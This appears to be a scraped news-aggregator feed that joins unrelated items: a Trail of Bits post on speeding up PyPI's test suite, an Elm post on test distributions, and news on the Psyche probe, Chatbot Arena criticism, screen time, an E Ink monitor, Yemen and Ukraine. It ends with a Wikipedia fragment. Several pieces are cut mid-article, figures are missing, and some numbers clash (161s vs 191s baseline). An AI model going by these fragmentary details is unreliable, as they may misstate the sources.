2025-05-01 14:37:57
Security updates have been issued by Debian (expat, fig2dev, firefox-esr, golang-github-gorilla-csrf, jinja2, libxml2, nagvis, qemu, request-tracker4, request-tracker5, u-boot, and vips), Fedora (firefox, giflib, and thunderbird), Mageia (imagemagick), Red Hat (thunderbird), SUSE (amber-cli, libjxl,...
Trail of Bits has collaborated with
PyPI
for several years to add
features and improve security defaults across the Python packaging ecosystem.
Our previous posts have focused on features like
digital attestations
and
Trusted Publishing
, but today we’ll look at a equally critical aspect
of holistic software security: test suite performance.
A robust testing suite is essential to the security and reliability of a complex
codebase. However, as test coverage grows, so does execution time, creating
friction in the development process and disincentivizing frequent and meaningful
(i.e., deep) testing. In this post, we’ll detail how we methodically optimized
the test suite for
Warehouse
(the back end that powers PyPI),
reducing
execution time from 163 seconds to 30 seconds
while the
test count grew
from 3,900 to over 4,700
.
Figure 1: Warehouse test execution time over a 12-month period (March 2024 to April 2025).
We achieved a
81% performance improvement
through several steps:
Parallelizing test execution with
pytest-xdist
(67% relative reduction)
Using Python 3.12’s
sys.monitoring
for more efficient coverage
instrumentation (53% relative reduction)
Optimizing test discovery with strategic testpaths configuration
Eliminating unnecessary imports that added startup overhead
These optimizations are directly applicable to many Python projects,
particularly those with growing test suites that have become a
bottleneck in development workflows. By implementing even a subset of
these techniques, you can dramatically improve your own test performance
without any costs.
All times reported in this blog post are from running the Warehouse test suite
at the specified date, on a
n2-highcpu-32
machine. While not intended as
formal benchmarking results, these measurements provide clear evidence of the
impact of our optimizations.
The beast: Warehouse’s testing suite
PyPI is a critical component of the Python ecosystem: it serves over one
billion distribution downloads per day, and developers worldwide depend on
its reliability and integrity for the software artifacts that they
integrate into their stacks.
This criticality makes comprehensive testing non-negotiable, and Warehouse
correspondingly demonstrates exemplary testing practices: 4,734 tests (as of
April 2025) provide 100% branch coverage across the combination of unit and
integration suites. These tests are implemented using the
pytest
framework and
run on every pull request and merge as part of a robust CI/CD pipeline, which
additionally enforces 100% coverage as an acceptance requirement. On our
benchmark system, the current suite execution time is approximately 30 seconds.
This performance represents a dramatic improvement from March 2024, when the test suite:
Contained approximately 3,900 tests (17.5% fewer tests)
Required 161 seconds to execute (5.4× longer)
Created significant friction in the development workflow
Below, we’ll explore the systematic approach we took to achieve these
improvements, starting with the highest-impact changes and working through to
the finer optimizations that collectively transformed the testing experience for
PyPI contributors.
Parallelizing test execution for massive gains
The most significant performance improvement came from a foundational computing
principle: parallelization. Tests are frequently well-suited for parallel
execution because well-designed test cases are isolated and have no side effects
or globally observable behavior. Warehouse’s unit and integration
tests were already well-isolated, making parallelization an obvious first
target for our optimization efforts.
We implemented parallel test execution using
pytest-xdist
, a popular plugin
that distributes tests across multiple CPU cores.
pytest-xdist
configuration is straightforward: this single line change is enough!
Figure 2: Configuring pytest to run with pytest-xdist.
With this simple configuration,
pytest
automatically uses all available CPU
cores. On our 32-core test machine, this immediately yielded dramatic
improvements while
also
revealing several challenges that required careful
solutions.
Challenge: database fixtures
Each test worker needed its isolated database instance to prevent cross-test contamination.
This change made each worker use its own database instance, preventing any
cross-contamination between different workers.
Challenge: coverage reporting
Test parallelization broke our coverage reporting since each worker process collected coverage data independently. Fortunately, this issue was covered in the
coverage documentation
. We solved the issue by adding a
sitecustomize.py
file.
Figure 4: Starting coverage instrumentation when using multiple workers.
Challenge: test output readability
Parallel execution produced interleaved, difficult-to-read output. We integrated
pytest-sugar
to provide cleaner, more
organized test results (
PR #16245
).
Results
These changes were merged in
PR #16206
and produced remarkable
results:
Before
After
Improvement
Test execution time
191s
63s
67% reduction
This single optimization delivered most of our performance gains while requiring
relatively few code changes, demonstrating the importance of addressing
architectural bottlenecks before fine-tuning individual components.
Optimizing coverage with Python 3.12’s
sys.monitoring
Our analysis identified code coverage instrumentation as another significant
performance bottleneck. Coverage measurement is essential for testing quality,
but traditional implementation methods add considerable overhead to test
execution.
PEP 669
introduced
sys.monitoring
, a
lighter-weight way to monitor the execution. The
coverage.py
library began
supporting this new API in version 7.4.0:
In Python 3.12 and above, you can try an experimental core based on the new
sys.monitoring module
by defining a
COVERAGE_CORE=sysmon
environment
variable. This should be faster, though plugins and dynamic contexts are not
yet supported with it.
(
source
)
Changes in Warehouse
# In Makefile
- docker compose run --rm --env COVERAGE=$(COVERAGE) tests bin/tests --postgresql-host db $(T) $(TESTARGS)
+ docker compose run --rm --env COVERAGE=$(COVERAGE) --env COVERAGE_CORE=$(COVERAGE_CORE) tests bin/tests --postgresql-host db $(T) $(TESTARGS)
Figure 5: Changes to the Makefile to allow setting the COVERAGE_CORE variable.
Using this new
coverage
feature was straightforward, thanks to
Ned Batchelder
’s excellent documentation and hard work!
Change impact
This change was merged in
PR #16621
and the results were also remarkable:
Before
After
Improvement
Test execution time
58s
27s
53% reduction
This optimization highlights another advantage of Warehouse’s development
process: by adopting new Python versions (in this case, 3.12) relatively
quickly, Warehouse was able to leverage
sys.monitoring
and benefit
directly from the performance improvements it lends to
coverage
.
Accelerating pytest’s test discovery phase
Understanding test collection overhead
In large projects, pytest’s test discovery process can become surprisingly expensive:
Pytest recursively scans directories for test files
It imports each file to discover test functions and classes
It collects test metadata and applies filtering
Only then can actual test execution begin
For PyPI’s 4,700+ tests, this discovery process alone consumed over 6 seconds—10% of our total test execution time after parallelization.
Strategic optimization with
testpaths
Warehouse tests are all located in a single directory structure, making them
ideal candidates for a powerful
pytest
configuration option:
testpaths
.
This simple one-line change instructs
pytest
to look for tests only in the
specified directory, eliminating wasted effort scanning irrelevant paths:
$ docker compose run --rm tests pytest --postgresql-host db --collect-only
# Before optimization:# 3,900+ tests collected in 7.84s# After optimization:# 3,900+ tests collected in 2.60s
Figure 7: Computing the test collection time.
This represents a 66% reduction in collection time.
Impact analysis
This change, merged in
PR #16523
, reduced the the total
test time from 50 seconds to 48 seconds—not bad for a single configuration line
change.
While a 2-second improvement might seem modest compared to our parallelization
gains, it’s important to consider:
Cost-to-benefit ratio
: This change required only a single line of configuration.
Proportional impact
: Collection represented 10% of our remaining test time.
Cumulative effect
: Every optimization compounds to create the overall improvement.
This optimization applies to many Python projects. For maximum benefit, examine
your project structure and ensure
testpaths
points precisely to your test
directories without including unnecessary paths.
Removing unnecessary import overhead
After implementing the previous optimizations, we turned to profiling import times
using Python’s
-X importtime
option. We were interested in how much time is
spent importing modules not used during the tests. Our analysis revealed that
the test suite spent significant time importing
ddtrace
, a module used
extensively in production but not during the tests.
# Before uninstall ddtrace> time pytest --help
real 0m4.975s
user 0m4.451s
sys 0m0.515s
# After uninstall ddtrace> time pytest --help
real 0m3.787s
user 0m3.435s
sys 0m0.346s
Figure 8: Time spent to load pytest with and without ddtrace.
Before
After
Improvement
Test execution time
29s
28s
3.4% reduction
This simple change was merged in
PR #17232
, reducing our test
execution time from 29 seconds to 28 seconds—a modest but meaningful 3.4%
improvement. The key insight here is to identify dependencies that provide no
value during testing but incur significant startup costs.
The database migration squashing experiment
As part of our systematic performance investigation, we analyzed the database
initialization phase to identify potential optimizations. Warehouse uses
Alembic
to manage database migrations, with over 400 migrations accumulated
since 2015. During test initialization, each parallel worker must execute these
migrations to establish a clean test database.
Quantifying migration overhead
While investigating test performance optimizations, we explored database
migration squashing as a potential solution. Indeed, Warehouse uses
alembic
to manage its database migrations. Since 2015, over 400 migration have
accumulated. And because you need to have the database up-to-date when running
tests, these migrations are executed in each test worker.
Figure 9: A quick and dirty way to measure migration overhead.
Migrations take about 1s per worker, so that’s something we could further improve.
Prototyping a solution
While Alembic doesn’t officially support migration squashing, we developed a
proof-of-concept based on
community feedback
. Our approach:
Created a
squashed
migration representing the current schema state.
Implemented environment detection to choose between paths:
Tests would use the single squashed migration
Production would continue using the full migration history
Our proof of concept further reduced test execution times by 13%.
Deciding not to merge
After careful review, the project maintainers decided against merging
this change. The added complexity of managing squashed migrations and a second
migration path outweighed the time benefits.
This exploration illustrates a crucial principle of performance engineering: not
all optimizations that improve metrics should be implemented. A holistic
evaluation must also consider long-term maintenance costs. Sometimes, accepting a
performance overhead is the right architectural decision for the long-term
health of the project.
Test performance as a security practice
Optimizing test performance is not merely a developer convenience—it’s part of
a security mindset. Faster tests tighten feedback loops, encourage more
frequent testing, and enable developers to catch issues before they
reach production. Faster test time is a also a part of the security posture.
All the improvements described in this post were achieved without modifying test
logic or reducing coverage—a testament to how much performance can be gained
without security trade-offs.
Quick wins to accelerate your test suite
If you are looking to apply these techniques to your own test suites, here are
some advices on how to prioritize your optimization efforts for maximum impact.
Parallelize your test suite: install
pytext-xdist
and
add
--numprocesses=auto
to your
pytest
configuration.
Optimize coverage instrumentation: if you’re on Python 3.12+, set
export COVERAGE_CORE=sysmon
to use the lighter-weight monitoring API
in
coverage.py 7.4.0
and newer.
Speed up test discovery: Use
testpaths
in your
pytest
configuration to
focus test collection on only relevant directories and reduce collection
times.
Eliminate unnecessary imports: use
python -X importtime
to identify
slow-loading modules and remove them where possible.
With a couple of highly targeted changes, you can achieve significant
improvements in your own test suites while maintaining their effectiveness as a
quality assurance tool.
Security loves speed
Fast tests enable developers to do the right thing. When your tests run in
seconds rather than minutes, security practices like
testing every change
and
running the entire suite before merging
become realistic expectations rather than
aspirational guidelines. Your test suite is a frontline defense, but only if it
actually runs. Make it fast enough that no one thinks twice about running it.
Acknowledgments
Warehouse is a community project, and we weren’t the only ones improving its
test suite. For instance,
PR #16295
and
PR #16384
by
@twm
also improved
performance by turning off file synchronization for
postgres
and caching DNS
requests.
This work would not have been possible without the broader community of open
source developers who maintain PyPI and the libraries that power it. In particular,
we would like to thank
@miketheman
for motivating and reviewing this work,
as well as for his own relentless improvements to Warehouse’s developer experience.
We also extend our sincere thanks to
Alpha-Omega
for funding this important work,
as well as for funding
@miketheman
’s own role as PyPI’s Security and Safety
Engineer.
Our optimizations also stand on the shoulders of projects like
pytest
,
pytest-xdist
,
and
coverage.py
, whose maintainers have invested countless hours in building robust,
performant foundations.
For example, one weakness of our test above is that we chose to pop and push with equal probability. As a result, our queue is very short on average. We never exercise large queues!
He asked:
How does one detect which situations are or aren’t covered in practice by property-based tests? Like, when would you say “the distribution we have doesn’t cover this case”?
How do you indeed! You could use
Fuzz.examples
to visually check whether the generated values make sense to you:
-- inside Elm REPL
> import Fuzz
> Fuzz.examples 10 (Fuzz.intRange 0 10)
[4,6,3,6,9,9,9,3,3,6]
: List Int
but did you just get unlucky and saw no 0 and 10, or do they never get generated?
To build the motivation a little bit, let’s try and see the issue from the TigerBeetle blogpost. Assume we have a Queue implementation (the details don’t matter):
type Queue a
empty : Queue a
push : a -> Queue a -> Queue a
pop : Queue a -> (Maybe a, Queue a)
length : Queue a -> Int
Now let’s try to test it!
type QueueOp
= Push Int
| Pop
queueOpFuzzer : Fuzzer QueueOp
queueOpFuzzer =
Fuzz.oneOf
[ Fuzz.map Push Fuzz.int
, Fuzz.constant Pop
]
applyOp : QueueOp -> Queue Int -> Queue Int
applyOp op queue =
case op of
Push n ->
Queue.push n queue
Pop ->
Queue.pop queue
|> Tuple.second
queueFuzzer : Fuzzer (Queue Int)
queueFuzzer =
Fuzz.list queueOpFuzzer
-- would generate [ Push 10, Pop, Pop, Push 5 ] etc.
|> Fuzz.map (\ops -> List.foldl applyOp Queue.empty ops)
-- instead generates a queue with the ops applied
The
queueFuzzer
makes a sort of random walk through the ops to arrive at a random Queue.
Now if we were worried we’re not testing very interesting cases, we could debug-print their lengths and look at the logs real hard and make a gut decision about whether it’s fine, but doesn’t that feel a bit icky?
With all of the secrets out, let me now properly introduce you to
Test.Distribution
. It’s a relatively new addition to the Elm test library API (added in
v2.0.0
, has been 3 years already, wow) which lets you measure or alternatively
enforce
how often each interesting case needs to happen.
Before I get to the actual
Test.Distribution
stuff, let me also say that in addition to the
Fuzz.examples
mentioned earlier there’s also
Fuzz.labelExamples
which you can use in the REPL to see an example of each labelled case (if it occurs):
Fuzz.labelExamples 100
[ ( "Lower boundary (1)", \n -> n == 1 )
, ( "Upper boundary (20)", \n -> n == 20 )
, ( "In the middle (2..19)", \n -> n > 1 && n < 20 )
, ( "Outside boundaries??", \n -> n < 1 || n > 20 )
]
(Fuzz.intRange 1 20)
-->
[ ( [ "Lower boundary (1)" ], Just 1 )
, ( [ "Upper boundary (20)" ], Just 20 )
, ( [ "In the middle (2..19)" ], Just 3 )
, ( [ "Outside boundaries??" ], Nothing )
]
As you can see, each case consists of a label and a predicate. These can overlap:
As you would expect, of the 20 numbers in the range
1..20
,
there are 10 even and 10 odd ones
the labels
even
and
odd
should happen with probability 10/20 (50% of the time), though the real counts will vary slightly due to randomness
there are 6 multiples of 3
the label
fizz
should happen with probability 6/20 (30% of the time)
there are 4 multiples of 5
the label
buzz
should happen with probability 4/20 (20% of the time)
Note the combinations are disjoint in a sense: the hits for
fizz, buzz, odd
aren’t
counted in
fizz, odd
and that’s why
fizz, odd
only shows around 10% probability instead of the expected 15%:
fizz, buzz, odd
has stolen the missing 5% from it as a more specific combination of labels.
Distributions are more useful when you enforce them instead of just reporting them. Use
Test.expectDistribution
:
Test.fuzzWith
{ runs = 100
, distribution =
Test.expectDistribution
[ ( Test.Distribution.atLeast 4, "low", \n -> n == 1 )
, ( Test.Distribution.atLeast 4, "high", \n -> n == 20 )
, ( Test.Distribution.atLeast 80, "in between", \n -> n > 1 && n < 20 )
, ( Test.Distribution.zero, "outside", \n -> n < 1 || n > 20 )
, ( Test.Distribution.moreThanZero, "one", \n -> n == 1 )
]
}
(Fuzz.intRange 1 20)
"Int range boundaries - mandatory"
(\n -> Expect.pass)
In the test above, we expect the uniform fuzzer of numbers 1..20 to produce the number 1 at least 4% of the time. If the real probability was 2%, the test would fail on grounds of distribution, even though the actual test function always passes.
In reality the number 1 will happen 5% of the time (1/20;
Fuzz.intRange
is uniform), but it’s not the best idea to enforce the exact probability that will happen, because the library tries to run the fuzzer until it’s statistically sure (1 false positive in 10
9
runs) that the distribution is reached.
This means that instead of the default 100 fuzzed values it might end up generating thousands or millions of values to make sure. So being a bit off the real probability helps keep the test suite fast.
Test.expectDistribution
won’t show the table and will generally be silent, but it will complain loudly and fail the test if the wanted distribution isn’t reached (even if the actual test function passes), like in the following example where I’ve bumped the expected probability of generating the number 1 to 10%:
✗ Int range boundaries - mandatory
Distribution of label "low" was insufficient:
expected: 10.000%
got: 5.405%.
(Generated 2146 values.)
You can see it generated 2146 values to be sure of the result, instead of the specified 100.
That about covers it! This post mostly wants to show that this
can be done
in the Elm PBT testing world; if you want to dive deeper I heartily recommend the mentioned
YouTube talk
by John Hughes.
TL;DR: with
Test.Distribution
you can measure and enforce how often do your tests generate categories of values of your choosing.
NASA's Psyche spacecraft hits a speed bump on the way to a metal asteroid
An illustration depicts a NASA spacecraft approaching the metal-rich asteroid Psyche. Though there are no plans to mine Psyche, such asteroids are being eyed for their valuable resources.
Credit:
NASA/JPL-Caltech/ASU
Each electric thruster on Psyche generates just 250 milli-newtons of thrust, roughly equivalent to the weight of three quarters. But they can operate for months at a time, and over the course of a multi-year cruise, these thrusters provide a more efficient means of propulsion than conventional rockets.
The plasma thrusters are reshaping the Psyche spacecraft's path toward its destination, a metal-rich asteroid also named Psyche. The spacecraft's four electric engines, known as Hall effect thrusters, were supplied by a Russian company named Fakel. Most of the other components in Psyche's propulsion system—controllers, xenon fuel tanks, propellant lines, and valves—come from other companies or the spacecraft's primary manufacturer, Maxar Space Systems, in California.
The Psyche mission is heading first for Mars, where the spacecraft will use the planet's gravity next year to slingshot itself into the asteroid belt, setting up for arrival and orbit insertion around the asteroid Psyche in August 2029.
Psyche
launched in October 2023
aboard a SpaceX Falcon Heavy rocket on the opening leg of a six-year sojourn through the Solar System. The mission's total cost adds up to more than $1.4 billion, including development of the spacecraft and its instruments, the launch, operations, and an
experimental laser communications package
hitching a ride to deep space with Psyche.
Psyche, the asteroid, is the size of Massachusetts and circles the Sun in between the orbits of Mars and Jupiter. No spacecraft has visited Psyche before. Of the approximately 1 million asteroids discovered so far, scientists say only nine have a metal-rich signature like Psyche. The team of scientists who put together the Psyche mission have little idea of what to expect when the spacecraft gets there in 2029.
Metallic asteroids like Psyche are a mystery. Most of Psyche's properties are unknown other than estimates of its density and composition. Predictions about the look of Psyche's craters, cliffs, and color have inspired artists to create a cacophony of illustrations, often showing sharp spikes and grooves alien to rocky worlds.
In a little more than five years, assuming NASA gets past Psyche's propulsion problem, scientists will supplant speculation with solid data.
Researchers Say the Most Popular Tool for Grading AIs Unfairly Favors Meta, Google, OpenAI
403 Media
www.404media.co
2025-05-01 14:00:15
Chatbot Arena is the most popular AI benchmarking tool, but new research says its scores are misleading and benefit a handful of the biggest companies....
The most popular method for measuring what are the best chatbots in the world is flawed and frequently manipulated by powerful companies like OpenAI and Google in order to make their products seem better than they actually are, according to
a new paper
from researchers at the AI company Cohere, as well as Stanford, MIT, and other universities.
The researchers came to this conclusion after reviewing data that’s made public by Chatbot Arena (also known as LMArena and LMSYS), which facilitates benchmarking and maintains the leaderboard listing the best large language models, as well as scraping Chatbot Arena and their own testing. Chatbot Arena, meanwhile, has responded to the researchers findings by saying that while it accepts some criticisms and plans to address them, some of the numbers the researchers presented are wrong and mischaracterize how Chatbot Arena actually ranks LLMs. The research was published just weeks
after Meta was accused of gaming AI benchmarks
with one of its recent models.
If you’re wondering why this beef between the researchers, Chatbot Arena, and others in the AI industry matters at all, consider the fact that the biggest tech companies in the world as well as a great number of lesser known startups are currently in a fierce competition to develop the most advanced AI tools, operating under the belief that these AI tools will define the future of humanity and enrich the most successful companies in this industry in a way that will make previous technology booms seem minor by comparison.
I should note here that Cohere is an AI company that produces its own models and that they don’t appear to rank very highly in the Chatbot Arena leaderboard. The researchers also make the point that proprietary closed models from competing companies appear to have an unfair advantage to open-source models, and that Cohere proudly boasts that its model Aya is “one of the largest open science efforts in ML to date.” In other words, the research is coming from a company that Chatbot Arena doesn’t benefit.
Judging which large language model is the best is tricky because different people use different AI models for different purposes and what is the “best” result is often subjective, but the desire to compete and compare these models has made the AI industry default to the practice of benchmarking AI models. Specifically, Chatbot Arena, which gives a numerical “Arena Score” to models companies submit and maintains a leaderboard listing the highest scoring models. At the moment, for example, Google’s Gemini 2.5 Pro is in the number one spot, followed by OpenAI’s o3, ChatGPT 4o, and X’s Grok 3.
The vast majority of people who use these tools probably have no idea the Chatbot Arena leaderboard exists, but it is a big deal to AI enthusiasts, CEOs, investors, researchers, and anyone who actively works or is invested in the AI industry. The significance of the leaderboard also remains despite the fact that it has been
criticized extensively
over time for the reasons I list above. The stakes of the AI race and who will win it are objectively very high in terms of the money that’s being poured into this space and the amount of time and energy people are spending on winning it, and Chatbot Arena, while flawed, is one of the few places that’s keeping score.
“A meaningful benchmark demonstrates the relative merits of new research ideas over existing ones, and thereby heavily influences research directions, funding decisions, and, ultimately, the shape of progress in our field,” the researchers write in their paper, titled “The Leaderboard illusion.” “The recent meteoric rise of generative AI models—in terms of public attention, commercial adoption, and the scale of compute and funding involved—has substantially increased the stakes and pressure placed on leaderboards.”
The way that Chatbot Arena works is that anyone can go to its site and type in a prompt or question. That prompt is then given to two anonymous models. The user can’t see what the models are, but in theory one model could be ChatGPT while the other is Anthropic’s Claude. The user is then presented with the output from each of these models and votes for the one they think did a better job. Multiply this process by millions of votes and that’s how Chatbot Arena determines who is placed where on the leaderboards. Deepseek, the Chinese AI model that rocked the industry when it was released in January, is currently ranked #7 on the leaderboard, and its high score was part of the reason people were so impressed.
According to the researchers’ paper, the biggest problem with this method is that Chatbot Arena is allowing the biggest companies in this space, namely Google, Meta, Amazon, and OpenAI, to run “undisclosed private testing” and cherrypick their best model. The researchers said their systemic review of Chatbot Arena involved combining data sources encompassing 2 million “battles,” auditing 42 providers and 243 models between January 2024 and April 2025.
“This comprehensive analysis reveals that over an extended period, a handful of preferred providers have been granted disproportionate access to data and testing,” the researchers wrote. “In particular, we identify an undisclosed Chatbot Arena policy that allows a small group of preferred model providers to test many model variants in private before releasing only the best-performing checkpoint.”
Basically, the researchers claim that companies test their LLMs on Chatbot Arena to find which models score best, without those tests counting towards their public score. Then they pick the model that scores best for official testing.
Chatbot Arena says the researchers’ framing here is misleading.
“We designed our policy to prevent model providers from just reporting the highest score they received during testing. We only publish the score for the model they release publicly,”
it said on X
.
“In a single month, we observe as many as 27 models from Meta being tested privately on Chatbot Arena in the lead up to Llama 4 release,” the researchers said. “Notably, we find that Chatbot Arena does not require all submitted models to be made public, and there is no guarantee that the version appearing on the public leaderboard matches the publicly available API.”
In early April, when Meta’s model Maverick shot up to the second spot of the leaderboard, users were confused because they didn’t find it that good and better than other models that ranked below it. As
Techcrunch noted at the time
, that might be because Meta used a slightly different version of the model “optimized for conversationality” on Chatbot Arena than what users had access to.
“We helped Meta with pre-release testing for Llama 4, like we have helped many other model providers in the past,” Chatbot Arena said in response to the research paper. “We support open-source development. Our own platform and analysis tools are open source, and we have released millions of open conversations as well. This benefits the whole community.”
The researchers also claim that makers or proprietary models, like OpenAI and Google, collect far more data from their testing on Chatbot Arena than fully open-source models, which allows them to better fine tune the model to what Chatbot Arena users want.
That last part on its own might be the biggest problem with Chatbot Arena’s leaderboard in the long term, since it incentivizes the people who create AI models to design them in a way that scores well on Chatbot Arena as opposed to what might make them materially better and safer for users in a real world environment.
As the researchers write: “the over-reliance on a single leaderboard creates a risk that providers may overfit to the aspects of leaderboard performance, without genuinely advancing the technology in meaningful ways. As
Goodhart’s Law
states, when a measure becomes a target, it ceases to be a good measure.”
Despite their criticism, the researchers acknowledge the contribution of Chatbot Arena to AI research and that it serves a need, and their paper ends with a list of recommendations on how to make it better, including preventing companies from retracting scores after submission, being more transparent which models engage in private testing and how much.
“One might disagree with human preferences—they’re subjective—but that’s exactly why they matter,” Chatbot Arena said on X in response to the paper. “Understanding subjective preference is essential to evaluating real-world performance, as these models are used by people. That’s why we’re working on statistical methods—like style and sentiment control—to decompose human preference into its constituent parts. We are also strengthening our user base to include more diversity. And if pre-release testing and data helps models optimize for millions of people’s preferences, that’s a positive thing!”
“If a model provider chooses to submit more tests than another model provider, this does not mean the second model provider is treated unfairly,” it added. “Every model provider makes different choices about how to use and value human preferences.”
About the author
Emanuel Maiberg is interested in little known communities and processes that shape technology, troublemakers, and petty beefs. Email him at emanuel@404media.co
Children under six should avoid screen time, French medical experts say
Guardian
www.theguardian.com
2025-05-01 13:54:38
TV, tablets and smartphones ‘hinder and alter brain development’, open letter says Children under the age of six should not be exposed to screens, including television, to avoid permanent damage to their brain development, French medical experts have said. TV, tablets, computers, video games and sma...
Children under the age of six should not be exposed to screens, including television, to avoid permanent damage to their brain development,
French medical experts have said
.
TV, tablets, computers, video games and smartphones have “already had a heavy impact on a young generation sacrificed on the altar of ignorance”, according to an open letter to the government from five leading health bodies – the societies of paediatrics, public health, ophthalmology, child and adolescent psychiatry, and health and environment.
Calling for an urgent rethink by public policies to protect future generations, they said: “Screens in whatever form do not meet children’s needs. Worse, they hinder and alter brain development,” causing “a lasting alteration to their health and their intellectual capacities”.
Current recommendations in
France
are that children should not be exposed to screens before the age of three and have only “occasional use” between the ages of three and six in the presence of an adult.
The societies suggest the ban on screens should apply at home and in schools.
They wrote: “Neither the screen technology nor its content, including so-called ‘educational’ content, are adapted to a small developing brain.
Children
are not miniature adults: their needs are different needs.”
They add that every day health professionals and infant school teachers “observe the damage caused by regular exposure to screens before they [children] enter elementary school: delayed language, attention deficit, memory problems and motor agitation”.
The experts suggest regular exposure to screens – however brief – has also had a negative effect on children’s social and emotional development. They suggest the problem affects all social groups, but particularly disadvantaged households leading to greater “social inequalities”.
Alternatives including “reading aloud, free play, board games or outdoor games, physical, creative and artistic activities”.
The letter says: “It would occur to no one to let a child of under six cross the road on their own. Why then expose them to a screen when this compromises their health and their intellectual future?”
Last year, a report commissioned by France’s president, Emmanuel Macron, found that French three- to six-year-olds spent an average of 1 hour 47 minutes a day in front of a screen in 2014-15, the latest available research. Since then, however, only one of the commission’s recommendations, concerning the exposure of under-threes to screens, has been implemented.
Former prime minister Gabriel Attal has gone further, proposing to ban children under 15 from social media, with an online “curfew” for 15- to 18-year-olds halting their access to social media at 10pm.
If you're in the market for a $1,900 color E Ink monitor, one of them exists now
Color E Ink in its current state requires a whole lot of compromises, as we've found when reviewing devices like
reMarkable's Paper Pro
or
Amazon's Kindle Colorsoft
, including washed-out color, low refresh rates, and a grainy look that you don't get with regular black-and-white E Ink. But that isn't stopping device manufacturers from exploring the technology, and today, Onyx International has announced that it has a $1,900 color E Ink monitor that you can connect to your PC or Mac.
The
Boox Mira Pro
is a 25.3-inch monitor with a 3200×1800 resolution and a 16:9 aspect ratio, and it builds on the company's previous black-and-white Mira Pro monitors. The Verge
reports
that the screen uses E Ink Kaleido 3 technology, which can display up to 4,096 colors. Both image quality and refresh rate will vary based on which of the monitor's four presets you use (the site isn't specific about the exact refresh rate but does note that "E Ink monitors' refresh speed is not as high as conventional monitors', and increased speed will result in more ghosting").
The monitor's ports include one full-size HDMI port, a mini HDMI port, a USB-C port, and a DisplayPort. Its default stand is more than a little reminiscent of
Apple's Studio Display
, but it also supports VESA mounting.
Onyx International's lineup of Boox devices usually focuses on Android-powered E Ink tablets, which the company has been building for over a decade. These are notable mostly because they combine the benefits of E Ink—text that's easy on the eyes and long battery life—and access to multiple bookstores and other content sources via Google Play, rather than tying you to one manufacturer's ecosystem as Amazon's Kindles or other dedicated e-readers do.
Yemeni People in State of "Terror" After 1,000+ U.S. Airstrikes Kill Hundreds: Helen Lackner
Democracy Now!
www.democracynow.org
2025-05-01 13:53:23
A U.S. military strike on a migrant detention center in the north of Yemen has killed at least 68 people, largely migrants from African nations, bringing the death toll from U.S. attacks on the country to over 250 since mid-March. Middle East researcher Helen Lackner says the number of deaths is lik...
May 1 and 2 are Public Media Giving Days. With lies and disinformation flooding the media landscape, and the Trump administration increasing its attacks on journalists, the need for independent news questioning and challenging those in power is more critical now than ever. We do not take any government or corporate funding, so we can remain unwavering in our commitment to bring you fearless trustworthy reporting on the issues that matter most.
Thanks to a group of generous donors, all donations made today will be DOUBLED, which means your $15 gift is worth $30.
If our journalism is important to you, please donate today.
Every dollar makes a difference
. Thank you so much.
Democracy Now!
Amy Goodman
Non-commercial news needs your support.
We rely on contributions from you, our viewers and listeners to do our work. If you visit us daily or weekly or even just once a month, now is a great time to make your monthly contribution.
A U.S. military strike on a migrant detention center in the north of Yemen has killed at least 68 people, largely migrants from African nations, bringing the death toll from U.S. attacks on the country to over 250 since mid-March. Middle East researcher Helen Lackner says the number of deaths is likely twice the officially recorded number, as the United States has now conducted more than 1,000 strikes on Yemen “on an absolutely nightly basis.” Lackner says the humanitarian crisis in Yemen has also been exacerbated by the end of U.S. aid and the U.S.'s designation of the country's Houthi movement as a “foreign terrorist organization.” “People who are living in the country are suffering on a daily basis from basically terror and fright or from being attacked and possibly being bombed and killed [at] any time.”
The original content of this program is licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License
. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
Non-commercial news needs your support
We rely on contributions from our viewers and listeners to do our work.
Please do your part today.
Is Trump's "Minerals Deal" a Fossil Fuel Shakedown? Antonia Juhasz on New U.S.-Ukraine Agreement
Democracy Now!
www.democracynow.org
2025-05-01 13:43:46
The Trump administration has signed a deal with Ukraine to give the United States a long-term stake in the country’s oil, gas, coal and mineral resources as part of a joint investment fund with Kyiv. President Trump has sought to frame the agreement as repayment of U.S. military aid to Ukraine...
May 1 and 2 are Public Media Giving Days. With lies and disinformation flooding the media landscape, and the Trump administration increasing its attacks on journalists, the need for independent news questioning and challenging those in power is more critical now than ever. We do not take any government or corporate funding, so we can remain unwavering in our commitment to bring you fearless trustworthy reporting on the issues that matter most.
Thanks to a group of generous donors, all donations made today will be DOUBLED, which means your $15 gift is worth $30.
If our journalism is important to you, please donate today.
Every dollar makes a difference
. Thank you so much.
Democracy Now!
Amy Goodman
Non-commercial news needs your support.
We rely on contributions from you, our viewers and listeners to do our work. If you visit us daily or weekly or even just once a month, now is a great time to make your monthly contribution.
The Trump administration has signed a deal with Ukraine to give the United States a long-term stake in the country’s oil, gas, coal and mineral resources as part of a joint investment fund with Kyiv. President Trump has sought to frame the agreement as repayment of U.S. military aid to Ukraine since the start of Russia’s invasion in February 2022. We speak with investigative journalist Antonia Juhasz, who characterizes the deal as an “unprecedented” resource “grab” that allows Trump to reopen U.S. access to Russian oil and gas, which can be channeled through Ukrainian energy infrastructure.
The original content of this program is licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License
. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
Non-commercial news needs your support
We rely on contributions from our viewers and listeners to do our work.
Please do your part today.
This article is about the labour holiday. For the traditional spring holiday, see
May Day
. For other labour-related holidays, see
Labour Day (disambiguation)
.
International Workers' Day
2013 International Workers’ Day demonstration in Austria
Labor Celebration days existed in some European countries since the end of 18th century
[
12
]
- sometimes on January 20 (France, 1793),
[
13
]
sometimes on June 5 (France, 1867).
[
14
]
On 21 April 1856, Australian
stonemasons
in
Victoria
undertook a mass stoppage as part of the
eight-hour workday
movement.
[
15
]
It became a yearly commemoration, inspiring American workers to have their first stoppage.
[
16
]
1 May was chosen to be International Workers' Day to commemorate the 1886
Haymarket affair
in
Chicago
.
[
17
]
In that year beginning on 1 May, there was a general strike for the eight-hour workday. On 4 May, the police acted to disperse a public assembly in support of the strike when an unidentified person threw a bomb. The police responded by firing on the workers. The event led to the deaths of seven police officers and at least four civilians; sixty police officers were injured, as were one hundred and fifteen civilians.
[
18
]
[
19
]
Hundreds of labour leaders and sympathizers were later rounded-up and four were executed by hanging, after a trial that was seen as a
miscarriage of justice
.
[
20
]
[
